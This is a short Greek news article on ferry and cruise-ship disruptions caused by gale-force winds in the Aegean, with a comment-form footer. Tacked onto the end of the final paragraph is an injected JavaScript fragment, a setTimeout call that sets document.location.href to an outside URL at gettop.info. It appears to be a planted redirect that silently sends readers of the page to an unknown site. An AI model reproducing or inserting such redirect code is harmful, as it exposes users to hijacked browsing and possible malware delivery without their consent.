Μικρά προβλήματα στις ακτοπλοϊκές συγκοινωνίες λόγω θυελλωδών ανέμων

0
10

 

Δυσκολίες να προσεγγίσει το λιμάνι της Σούδας αντιμετώπισε το κρουαζιερόπλοιο «Costa Neoriviera» λόγω ισχυρών νότιων ανέμων. Τελικά το πλοίο οδήγησαν στο λιμάνι τρία ρυμουλκά. Το κρουαζιερόπλοιο, φιλοξενεί 1.250 επιβάτες και διαθέτει 700 άτομα για πλήρωμα. Θα αναχωρήσει από τα Χανιά στις 10 βράδυ.

Στο μεταξύ, η ενίσχυση ανέμων σε πολλές θαλάσσιες περιοχές προκαλεί προβλήματα στις ακτοπλοϊκές συγκοινωνίες. Ακόμη είναι σε ισχύ απαγορευτικό απόπλου από τα λιμάνια της Ραφήνας και του Λαυρίου.

Κανονικά εκτελούνται τα δρομολόγια των πλοίων από τον Πειραιά για τον Αργοσαρωνικό και τα νησιά του Αιγαίου.

Κλειστή παραμένει, επίσης, η γραμμή Καβάλα-Πρίνου. Η Εθνική Μετεωρολογική Υπηρεσία εξέδωσε δελτίο αναγγελίας θυελλωδών ανέμων για το Κεντρικό και το Βορειοανατατολικό Αιγαίο.

Οι άνεμοι θα πνέουν 5 με 7 μποφόρ και σε πολλές θαλάσσιες περιοχές κατά τόπους τα 8 με 9. Οι επιβάτες που πρόκειται να ταξιδέψουν καλό είναι πριν την αναχώρησή τους να επικοινωνούν με τα κατά τόπους λιμεναρχεία και τουριστικά πρακτορεία για τυχόν τροποποιήσεις η αλλαγές των δρομολογίων.

Επιπλέον, δεν θα εκτελούνται προσωρινά τα δρομολόγια των πλοίων στην πορθμειακή γραμμή Ρίου-Αντιρρίου λόγω των ισχυρών ανέμων που επικρατούν στην περιοχή. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here